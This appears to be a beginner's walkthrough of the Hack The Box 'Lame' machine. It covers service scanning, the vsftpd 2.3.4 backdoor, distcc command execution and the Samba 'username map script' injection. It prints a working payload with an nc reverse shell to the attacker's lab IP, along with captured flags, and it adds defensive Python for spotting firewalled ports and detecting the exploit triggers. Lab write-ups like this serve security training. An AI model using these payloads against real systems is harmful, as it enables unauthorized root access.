Lame Writeup

Disclaimer
I'm just a beginner. Please correct me if I'm wrong.

This box is pretty lame.

Machine Information

Machine     Description
Name        Lame
OS          Linux
Difficulty  Easy
Author      ch4p

Reconnaissance

Service Scan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-22 01:37 EST
Nmap scan report for 10.129.69.61
Host is up (0.29s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.19
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2024-02-22T01:38:12-05:00
|_clock-skew: mean: 2h30m11s, deviation: 3h32m10s, median: 9s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.13 seconds

From the results:
1. FTP allows anonymous login.
2. There is no web app, so the attack surface is the existing services -> check whether their versions have known CVEs.

FTP - Port 21

Anonymous login

Login works, but there is nothing inside.

Terminal
┌──(xavier㉿kali)-[~/Documents/CTF/htb/lame]
└─$ ftp 10.129.69.61
Connected to 10.129.69.61.
220 (vsFTPd 2.3.4)
Name (10.129.69.61:xavier): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

SMB - Port 445

Anonymous login

Login works here too, but the only share that is readable and writable, /tmp, contains nothing of interest.

Terminal
┌──(xavier㉿kali)-[~/Documents/CTF/htb/lame]
└─$ crackmapexec smb 10.129.69.61 -u '' -p '' --shares                          
SMB         10.129.69.61    445    LAME             [*] Unix (name:LAME) (domain:hackthebox.gr) (signing:False) (SMBv1:True)
SMB         10.129.69.61    445    LAME             [+] hackthebox.gr\: 
SMB         10.129.69.61    445    LAME             [+] Enumerated shares
SMB         10.129.69.61    445    LAME             Share           Permissions     Remark
SMB         10.129.69.61    445    LAME             -----           -----------     ------
SMB         10.129.69.61    445    LAME             print$                          Printer Drivers
SMB         10.129.69.61    445    LAME             tmp             READ,WRITE      oh noes!
SMB         10.129.69.61    445    LAME             opt                             
SMB         10.129.69.61    445    LAME             IPC$                            IPC Service (lame server (Samba 3.0.20-Debian))
SMB         10.129.69.61    445    LAME             ADMIN$                          IPC Service (lame server (Samba 3.0.20-Debian))

Terminal
┌──(xavier㉿kali)-[~/Documents/CTF/htb/lame]
└─$ crackmapexec smb 10.129.69.61 -u '' -p '' -M spider_plus --only-files -o READ_ONLY=false   
SMB         10.129.69.61    445    LAME             [*] Unix (name:LAME) (domain:hackthebox.gr) (signing:False) (SMBv1:True)
SMB         10.129.69.61    445    LAME             [+] hackthebox.gr\: 
SPIDER_P... 10.129.69.61    445    LAME             [*] Started spidering plus with option:
SPIDER_P... 10.129.69.61    445    LAME             [*]        DIR: ['print$']
SPIDER_P... 10.129.69.61    445    LAME             [*]        EXT: ['ico', 'lnk']
SPIDER_P... 10.129.69.61    445    LAME             [*]       SIZE: 51200
SPIDER_P... 10.129.69.61    445    LAME             [*]     OUTPUT: /tmp/cme_spider_plus

┌──(xavier㉿kali)-[~/Documents/CTF/htb/lame]
└─$ batcat /tmp/cme_spider_plus/10.129.69.61.json 
{
    "tmp": {
        ".X0-lock": {
            "atime_epoch": "2024-02-22 01:34:29",
            "ctime_epoch": "2024-02-22 01:34:29",
            "mtime_epoch": "2024-02-22 01:34:29",
            "size": "11 Bytes"
        },
        ".X11-unix/X0": {
            "atime_epoch": "2024-02-22 01:34:30",
            "ctime_epoch": "2024-02-22 01:34:29",
            "mtime_epoch": "2024-02-22 01:34:29",
            "size": "0 Bytes"
        },
        "5619.jsvc_up": {
            "atime_epoch": "2024-02-22 01:35:17",
            "ctime_epoch": "2024-02-22 01:35:17",
            "mtime_epoch": "2024-02-22 01:35:17",
            "size": "0 Bytes"
        },
        "vgauthsvclog.txt.0": {
            "atime_epoch": "2024-02-22 01:33:59",
            "ctime_epoch": "2024-02-22 01:33:59",
            "mtime_epoch": "2024-02-22 01:34:00",
            "size": "1.56 KB"
        }
    }
}

CVE-2011-2523 - vsftpd 2.3.4 Backdoor

Use searchsploit to look up known CVEs for the version:

Terminal
┌──(xavier㉿kali)-[~]
└─$ searchsploit vsftpd 2.3.4                   
-------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                      |  Path
-------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution                           | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)              | unix/remote/17491.rb
-------------------------------------------------------------------- ---------------------------------

CVE details

In July 2011 the vsftpd build distributed from the official website was found to have been tampered with: that version (2.3.4) had a backdoor planted, so that logging in with any username ending in a smiley :) opens a shell on port 6200.

It is useless here, though, because port 6200 cannot be reached; a firewall blocks it. How do I know? I'll explain later.

CVE-2004-2687 - DistCC Daemon - Command Execution

Besides searchsploit, you can also poke distcc directly with Metasploit:

Terminal
┌──(xavier㉿kali)-[~/Documents/CTF/htb/lame]
└─$ msfconsole 
msf6 > use exploit/unix/misc/distcc_exec 
[*] No payload configured, defaulting to cmd/unix/reverse_bash
msf6 exploit(unix/misc/distcc_exec) > set RHOSTS 10.129.69.61
RHOSTS => 10.129.69.61
msf6 exploit(unix/misc/distcc_exec) > check
[+] 10.129.69.61:3632 - The target is vulnerable.

Exploit

This turns out to be a vulnerable version as well; the RCE gives a shell, and with it user.txt:

id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uname -a
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
cat /home/makis/user.txt
9b6248858e31130017045acc97e586c3

After that I uploaded binaries over SMB, intending to start another service and set up a proxy, but both failed; only after looking at netstat and the other services did I realise there is a firewall.

Other attempts at this stage

Many services are listening, yet none of them showed up in the initial scan => firewall.

netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 0.0.0.0:512             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:513             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:2049            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:514             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:56485           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:47718           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:8009            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:6697            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:1099            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:47602           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:8787            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:8180            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:1524            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 10.129.69.61:53         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:5432            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:54618           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0   2048 10.129.69.61:44118      10.10.14.19:8787        ESTABLISHED on (0.48/0/0)
tcp6       0      0 :::2121                 :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 :::3632                 :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 :::53                   :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 :::22                   :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 :::5432                 :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 ::1:953                 :::*                    LISTEN      off (0.00/0/0)
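A defender's cross-check of the point above, added here and not part of the original writeup: parse the external nmap result and the host's own netstat listing, then report the ports that are bound on a routable address but never appeared from outside, which is the firewall signature noted above. The two samples are trimmed copies of this page's own scan and netstat output.

```python
import re

# Trimmed copies of the nmap and netstat output shown on this page.
NMAP_OUTPUT = """\
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
"""

NETSTAT_OUTPUT = """\
tcp        0      0 0.0.0.0:512             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0   2048 10.129.69.61:44118      10.10.14.19:8787        ESTABLISHED on (0.48/0/0)
tcp6       0      0 :::3632                 :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 :::22                   :::*                    LISTEN      off (0.00/0/0)
"""

NMAP_LINE = re.compile(r"^(\d+)/tcp\s+open\b")
# Bind address may be IPv4, "::" (all IPv6) or "::1"; the port is the digits after the last colon.
NETSTAT_LINE = re.compile(r"^tcp6?\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+LISTEN\b")
LOOPBACK = {"127.0.0.1", "::1"}

def nmap_open_ports(text):
    """Set of TCP ports nmap reported as open from the attacker's side."""
    return {int(m.group(1)) for line in text.splitlines() if (m := NMAP_LINE.match(line))}

def netstat_listeners(text):
    """Map port -> set of bind addresses for sockets in LISTEN state (ESTABLISHED lines are skipped)."""
    listeners = {}
    for line in text.splitlines():
        m = NETSTAT_LINE.match(line)
        if m:
            listeners.setdefault(int(m.group(2)), set()).add(m.group(1))
    return listeners

def filtered_ports(nmap_text, netstat_text):
    """Ports listening on a non-loopback address that the external scan never saw: likely firewalled."""
    seen = nmap_open_ports(nmap_text)
    return sorted(
        port for port, addrs in netstat_listeners(netstat_text).items()
        if port not in seen and not addrs <= LOOPBACK
    )

if __name__ == "__main__":
    print("listening but not reachable from outside:", filtered_ports(NMAP_OUTPUT, NETSTAT_OUTPUT))
```

Loopback-only listeners (port 953 here) are excluded on purpose: they are not expected to be reachable, so they say nothing about a firewall.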

I won't detail dictionary attacks against SSH and the like.

CVE-2007-2447 - Samba "username map script" Command Execution

A web search for "Samba smbd 3.0.20" turns up the Metasploit module on exploit-db; scrolling to the bottom of the script shows that the RCE works through the username field.

Metasploit script

Payload
"/=`nohup <COMMAND>`"

Add the payload when logging in:

Terminal
┌──(xavier㉿kali)-[~/Documents/CTF/htb/lame]
└─$ smbclient //10.129.69.61/tmp -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> logon "/=`nohup nc -e /bin/bash 10.10.14.19 8787`"
Password:
session setup failed: NT_STATUS_IO_TIMEOUT
smb: \> SMBecho failed (NT_STATUS_HOST_UNREACHABLE). The connection is disconnected now

Once the reverse shell connects back, we have root:

Terminal
┌──(xavier㉿kali)-[~]
└─$ nc -lvnp 8787
listening on [any] 8787 ...
connect to [10.10.14.19] from (UNKNOWN) [10.129.69.61] 47408
id
uid=0(root) gid=0(root)
cat /root/root.txt
0321c9e1cf74f79997eb79644863a347

As for why I used nc instead of a bash reverse shell: because it just wouldn't connect back. I probably typed it wrong.
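An added detection example, not code from this writeup, from Metasploit or from Samba, covering the two login-name triggers on this page: shell metacharacters in an SMB username (the Samba "username map script" injection above) and the smiley in an FTP username (the vsftpd 2.3.4 backdoor). The smiley check matches ":)" anywhere in the name, which covers the trailing case described earlier; the authentication events and the smb.conf snippets are constructed, and the config check only flags the option the Samba CVE depends on.

```python
import re

# Characters that reach a shell when Samba's "username map script" (CVE-2007-2447)
# passes an unsanitised username to it; the page's payload relies on backticks.
SHELL_META = re.compile(r"[`;|&\n]|\$\(")

def login_name_findings(username, service):
    """Reasons a login name looks like an exploit trigger; service is 'smb' or 'ftp'."""
    findings = []
    if service == "smb" and SHELL_META.search(username):
        findings.append("shell metacharacters in SMB username (CVE-2007-2447 pattern)")
    # Checked anywhere in the name, not only at the end, to be safe.
    if service == "ftp" and ":)" in username:
        findings.append("':)' in FTP username (vsftpd 2.3.4 backdoor trigger, CVE-2011-2523)")
    return findings

def uses_username_map_script(smb_conf):
    """True if smb.conf sets 'username map script'; commented lines (# or ;) do not count."""
    for line in smb_conf.splitlines():
        key, _, value = line.partition("=")
        if key.strip().lower().replace(" ", "") == "usernamemapscript" and value.strip():
            return True
    return False

# Constructed authentication events, modelled on what an auth log or SMB audit trail
# would record; the first username is the page's payload template, not live data.
EVENTS = [
    {"service": "smb", "username": "/=`nohup <COMMAND>`", "src": "10.10.14.19"},
    {"service": "ftp", "username": "anonymous", "src": "10.10.14.19"},
    {"service": "ftp", "username": "user:)", "src": "10.10.14.19"},
    {"service": "smb", "username": "makis", "src": "10.10.14.19"},
]

def scan_events(events):
    """Return (src, service, username, findings) for each event that matches a rule."""
    hits = []
    for ev in events:
        findings = login_name_findings(ev["username"], ev["service"])
        if findings:
            hits.append((ev["src"], ev["service"], ev["username"], findings))
    return hits

if __name__ == "__main__":
    for src, service, name, findings in scan_events(EVENTS):
        print(f"{src} {service} {name!r}: {'; '.join(findings)}")
    # Vulnerable setting beside the commented-out (safe) form.
    print(uses_username_map_script("[global]\nusername map script = /etc/samba/scripts/map.sh\n"))
    print(uses_username_map_script("[global]\n; username map script = /etc/samba/scripts/map.sh\n"))
```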

Afterword

Lame is HTB's first box; its main purpose is practising the exploitation of known vulnerabilities.
The OS version is very old, so there are probably other privilege escalation paths as well.


Last update: 2024-12-23 Created: 2024-02-25